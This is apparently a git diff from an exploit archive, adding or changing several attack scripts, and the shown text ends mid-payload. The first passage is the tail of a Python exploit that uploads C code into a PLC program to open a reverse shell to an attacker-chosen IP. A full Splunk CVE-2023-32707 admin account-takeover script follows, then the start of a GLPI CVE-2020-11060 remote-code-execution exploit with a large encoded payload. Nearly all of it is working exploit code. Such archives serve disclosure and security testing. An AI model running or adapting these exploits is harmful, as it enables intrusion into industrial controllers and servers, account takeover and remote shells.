name=\"device_parity\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_data\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_stop\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_pause\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"di_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"di_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"do_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"do_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"ai_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"ai_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aor_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aor_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aow_start\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"aow_size\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------169043028319378579443281515639--\r\n" + + + + + + + + # \"ladder.h\"\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n \r\n \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n int port = "+rev_port+";\r\n struct sockaddr_in revsockaddr;\r\n\r\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n revsockaddr.sin_family = AF_INET; \r\n revsockaddr.sin_port = htons(port);\r\n revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n connect(sockt, (struct sockaddr *) &revsockaddr, \r\n sizeof(revsockaddr));\r\n dup2(sockt, 0);\r\n dup2(sockt, 1);\r\n dup2(sockt, 2);\r\n\r\n char * const argv[] = {\"/bin/sh\", NULL};\r\n execve(\"/bin/sh\", argv, NULL);\r\n\r\n return 0; \r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n" + inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data) + time.sleep(3) + # comp = x.get(compile_program) + # time.sleep(6) + # x.get(inject_dash) + # time.sleep(3) + # print('[+] Spawning Reverse Shell...') + start = x.get(run_plc_server) + time.sleep(1) + if start.status_code == 200: + print('[+] Reverse connection receveid!') + sys.exit(0) + else: + print('[+] Failed to receive connection :(') + sys.exit(0) + +auth() +injection() +connection() \ No newline at end of file diff --git a/exploits/multiple/webapps/51747.py b/exploits/multiple/webapps/51747.py new file mode 100755 index 000000000..27f1a7995 --- /dev/null +++ b/exploits/multiple/webapps/51747.py @@ -0,0 +1,96 @@ +#!/usr/bin/env python3 +# +# Exploit Title: Splunk 9.0.5 - admin account take over +# Author: [Redway Security](https://twitter.com/redwaysec)) +# Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99) + +#CVE: CVE-2023-32707 + +# Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned +# to it can escalate their privileges to that of the admin user by providing specially crafted web requests. +# +# Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14. +# +import argparse +import requests +import random +import string +import base64 +# ignore warnings +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# Parse command-line arguments +parser = argparse.ArgumentParser(description='Splunk Authentication') +parser.add_argument('--host', required=True, help='Splunk host or IP address') +parser.add_argument('--username', required=True, help='Splunk username') +parser.add_argument('--password', required=True, help='Splunk password') +parser.add_argument('--target-user', required=True, help='Target user') +parser.add_argument('--force-exploit', action='store_true', +help='Force exploit') + +args = parser.parse_args() + +# Splunk server settings +splunk_host = args.host.split(':')[0] +splunk_username = args.username +splunk_password = args.password +target_user = args.target_user +force_exploit = args.force_exploit + +splunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089 +user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users" + +credentials = f"{splunk_username}:{splunk_password}" +base64_credentials = base64.b64encode(credentials.encode()).decode() +headers = { +'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0', +'Authorization': f'Basic {base64_credentials}' + +} +proxies = { +# 'http': '[http://127.0.0.1:8080'](http://127.0.0.1:8080', +# 'https': 'http://127.0.0.1:8080' +} + +response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json", +headers=headers, proxies=proxies, verify=False) + +if response.status_code == 200: +affected_versions = ['9.0.4', '8.2.10', '8.1.13'] +user = response.json() +splunk_version = user['generator']['version'] +# This is not a good way to compare versions. +# There is a range of versions that are affected by this CVE, but this is just a PoC +# 8.1.0 to 8.1.13 +# 8.2.0 to 8.2.10 +# 9.0.0 to 9.0.4 +print(f"Detected Splunk version '{splunk_version}'") +if any(splunk_version <= value for value in affected_versions) or force_exploit: +user_capabilities = user['entry'][0]['content']['capabilities'] +if 'edit_user' in user_capabilities: +print( +f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.") +new_password = ''.join(random.choice( +string.ascii_letters + string.digits) for _ in range(8)) +change_password_payload = { +'password': new_password, +'force-change-pass': 0, +'locked-out': 0 +} +response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json", +data=change_password_payload, headers=headers, proxies=proxies, verify=False) +if response.status_code == 200: +print( +f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'") +else: +print('Account takeover failed') +else: +print( +f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.") +else: +print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707") +else: +print( +f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'") +exit(1) \ No newline at end of file diff --git a/exploits/php/webapps/51688.txt b/exploits/php/webapps/51688.txt index af724604c..def854e05 100644 --- a/exploits/php/webapps/51688.txt +++ b/exploits/php/webapps/51688.txt @@ -14,6 +14,4 @@ Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 756 -_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register - --- Sent with https://mailfence.com Secure and private email \ No newline at end of file +_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register \ No newline at end of file diff --git a/exploits/php/webapps/51726.py b/exploits/php/webapps/51726.py new file mode 100755 index 000000000..e5b741f42 --- /dev/null +++ b/exploits/php/webapps/51726.py @@ -0,0 +1,418 @@ +#!/usr/bin/env python3 + +#Exploit Title: GLPI GZIP(Py3) 9.4.5 - RCE +#Date: 08-30-2021 +#Exploit Authors: Brian Peters & n3rada +#Vendor Homepage: https://glpi-project.org/ +#Software Link: https://github.com/glpi-project/glpi/releases +#Version: 0.8.5-9.4.5 +#Tested on: Exploit ran on Kali 2021. GLPI Ran on Windows 2019 +#CVE: 2020-11060 + +# Built-in imports +import argparse +import random +import re +import string +from datetime import datetime + +# Third party library imports +import requests +from lxml import html + +# https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt +PAYLOAD = ";)qRJ*_O88Ux-0cRlA`B]5y[r.no5bKUb2EzEW34O(K~.Oa}pO}1F956/fp@mz`oQqahP+@[/tiLy:]YBmFrRmc*Jt}VxM^@(9BeSTo|zQ}6d/zF|LOMqSy:Nk5hCLU.s-Tx;fHci?1],*9}r;,FmIDZ5^|0SNYjN}H7z{(fPe1}~6u8i^_S38:64w+Q6rg*h4PZ`;h)mB*IeUhRLk;~}OVB`:XTKPnT4XS9pzLrze,[^Y/qnP5KEEo6t+ydw7m,@S/:_dka*4BAXKk?NvSgcV41P~r0iGI?/}lXrvB+94e3/E]aEUPVKmgPE[[Dc@Vjy.2mW+if^)c@n8a[`qt-0,S+sDM+RSj_M0V(@,I)SLHZg*rjV4HTKyQo9-[6OL7xhZKQDx03?Tc{|wo32~*QHgH;{@SPcPJ+}tXPPS~-@g:I-Zo+nxo+Y,pFjX8(.;Xr:jD6fx2IXJUMw.m{F7(@RFA6XHS{c`v(W~[yFLMvfBxiP;a58,w`pWEuNtKE~@N.t9fRDOqh1o.^G@W/rr5S_?8Ar/c[Ok}e|:i]P:DUB^o7*pUp[F6hml-32MT)@ih/f`T/~^r(.[+fLPhrD4aBO8u/4gPlr-6.}Mz(OTmHSO8XYa]^3|.*ASPLaB.*gzLUX|4,W_|E|M7all3?XXJ}Cy)6:M2fgiT@155[y0)^@HUXC+Iui9+-z^5dTm*{W}jSB@p8o-fHF)0gsa83,AjbbX]l0I{}k?}[,I`SgGyfZi1c2T@~lTM]}8-{H3DuMFd5+iAr?g9~~0P)AU8u`nk?a()`T@L;UMa@{zS9h7HTD*D1W3x*KNAmk7NXX-s8uQumOY3TLKnN4ls?*sPS/gS^O(/[ctaJYlJ-16_XqifQR(U?a1L@|;^3GHPg?J*mY)+[i(l4GBKj5r6Pkv-QxzVhgKKu9G*6~V6T)DiUK.Pxfy*X*QADUIB`L*GMYh0k[Lpk8eBYheF2yli-Czv7{Z:A4TDYo?PzLk6K5[0*vDbn53oPA(Np|U|AKVSqe/^bP~lkxPcUWXC-jt{27G.Fu;W`uu+cjgo5]m39R:3csXshb_EJ[p2i5~RD0.ZDYUa^Ev@mbA._4F@uVRx/LjW2h{tEME;tYpE,e55a*|lJ./kE1n]v_{/U8uyX:L/5ifJ^^WkTZ/nVC@,7oY^mMPV(-9stYKZWyg9fGtj+R4]Q.:.J5[;;v+rCL:O[JBHZ)Nk8s4(nbS*K]VH8,;Ya9V/.CwXV0X/3Rd{*~QeP6rn4|?V2n6vC|WtAU1JKba-INX`wmYI@}h)BO,^NHERJF~rMF]oz1?aaJI@H0^K`WG*8auteXa3svOvIcSqF6q?eyNA2sr)ai;nczU02qrz?s@W}N|VQr/.}R27*B4bA8?LrrbbOsR/VG[]Fii/vC9v;R7z76H,:0Lb(,qr}8Q_|;KCQGg(|I2*X3Nk-@GC[[7d)055J,/8{/JmL/odlgA8-O|?1yw6QmJjZxb;j[cFdy/B]/t?CG/y}Qyq|.RtE(rJ``i9ZxQarkR_yKlz21}~vpl~eLSV1+l/gi;k(]GdS^FueL7VMRa}{B@JUOy4gXP-By:)-jktZfg~f]Gz?D:UVqSJTAn_zLUQqPNHATd(2.uFeQhoO.L]EknPP3NZiLa8z1,;j/{p}k/V3KU:dgB4K}-U@Qx)g1wRI*]YyI6V^Ibl^4a*vwB+8*EiD^TAau8|]NAL(4Bn}*N+AfjHLqYDdbIuhYdP`~W0K@eM}*kj)t9`H(}fTh_0M@2kgUIBX-4dx05+)hIXtX]YtG*Y*dakDk.}9ZQeiGLnChu(S+Nk{:ZMA/HXEGz5L^)5Dh6qno8:Im[{aL_,eaw[ictOZav,APv}oRjmXp)sUsW5my2gm5boX}e-jQ38N3@RUe)J^|QF[IrZG*MfGkRw;ZK+~/cL4M38aBX8b7::Qq;(H+}yMEQV0Esr~zmd|uL4E,q6DsaD~b9Z;J5{At(/fKvOmXTIXiY.*DT42z62gPyW1;Ev*8]@jp{KgYnj1RCocqe~*tvcbWC2CRpA*Gjz(msc*KtdmW?fBsxzc/tle?@gVzi9sTGAMTJi/flQtFVJF^/Ls|RK.lQ`/m42oVGkM`+~V~I@g(9]cRR,`~D;k~TtM3e|):*vAg@LH55{:d:x4QkVb^R{Rll+CKMxa,rzSxG+D)L?ePUCgwZiMp.FwZe^]3gZOmU0kcSR-sc?@lQa)+vAMW7B}k?pF84QoQVIDE[W*4kKn~/GBQ[1Eg;46MRTMO3V31g^8yqz)--JO}2i;(oBbtyNd0XkM+_luyJH_NuZ?tZu|5.+Z.(,7j*(87Xya]mdZr_w?SeC{bE0@5]Nit?tyby`,rI6}.@@[42X]C)K,Tq[q/~feVi1mJl(CxPz`:*ZKl]J2}L;7.*tzTCC(s-BWgD9GzQpk]r*AP_GEQ]Cit6GRCbe;yZ}nreK+2q-ZPDrs^-G29dS@m4/4q*GnabGJW}.oahC88:]m?2hJrpy){pGcOf|7o3lxDUkST*Lham4z4B~}H3uLN{-,~+32@m[l|Rur9|jU_WqKUh+(D6i2[:(sR*)nc(E-2y}Rq]:,VsMIv1dot0m)3@aAARUMNMDxSMsq+O|O]y?_T,QvgXRQrA6c+r`zDr9NpNb2Eoq/?M},HgicpE@/NIjt;Sf^MaW`e^1ADhFcXqe4,KMhu1~GG8dlEU1|wE9NIoxjC(g`cIFq0^rItTK76{h1[SJLCn*w(w|(7F0Fva+~y{yzn1D2x4c-lv?p}wu9pF.?tlaB8a_~zu/4U0~j1/N?{E}1IZ`I{AM@GW{h{Ot1Pb@W@0Ha+7O?N|?B)ti20MTJ0Pm*g-~j/9L;^ouu?-O3-hDNt^0g3w:X92bA}ag_sZrJ3{}b|A^r}y/f(T.2{s`t;t1FGp83bT7lFRE.1;uas;(LIyNJ3OsoC;~-K,MToT+~~AlkS(;i0Pob*.;6+,s|ae2(cP.sF@`Tps6_+heNE_kKNVXk{Od8ETI`}q5):F?gO~ZBjd7G}Iy*QOOSDlTQQ-WsKJCu7Q~vH}NotKuTpwO8;mEElVqQ,D,mw56)}c9/?aooObfp+NRG9(L}b2hm`U9TxFxE5y}Nw0,sSN-jcj6q[;6Q~Jd*@kknF]XNDt(3HQKdoRT;2mYoMlM}Rn^S{ekyqsT:OX1;z8pUxT-XE)o?gXqNV].hEYrr4`Hy:aDh^4K1^|OzS{]7dZ]]--(Lp?{AIlUyHGf09PKy@r?:Dx-COsMlWeCcSp*3v_W(PWJHex:o9Uf:2Zvvfhx*eFT:g{@o]3}Y)uLO,bcugjJ0v/hq(LKCnr/zowwK0bqaQ^.ka5nE0U7/9+aokofDSyi9E|BUa[9*3vkr9Jxg)3S